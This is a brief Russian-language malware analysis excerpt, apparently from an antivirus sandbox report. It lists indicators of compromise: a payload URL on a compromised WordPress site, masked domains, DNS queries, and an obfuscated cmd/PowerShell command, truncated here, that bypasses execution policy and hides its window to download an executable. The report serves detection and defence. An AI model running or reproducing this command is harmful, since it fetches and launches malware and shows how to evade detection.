Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWERS^HE^L^l.eXE ^-^ExeCut^Io^N^pOL^ic^Y B^y^pAss^ ^-nOP^rO^fILe^ -WiNd^o^WsT^Y^Le^ h^iD^Den ^(^N^eW-ObjeC^t^ ^s^yS^T^em.n^Et.we^bcliEn^t).Down^lo^aD^f^iL^E('http://nexcontech.c...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "pOWERS^HE^L^l.eXE ^-^ExeCut^Io^N^pOL^ic^Y B^y^pAss^ ^-nOP^rO^fILe^ -WiNd^o^WsT^Y^Le^ h^iD^Den ^(^N^eW-ObjeC^t^ ^s^yS^T^em.n^Et.we^bcliEn^t).Down^lo^aD^f^iL^E('http://nexcontech.c...' (со скрытым окном)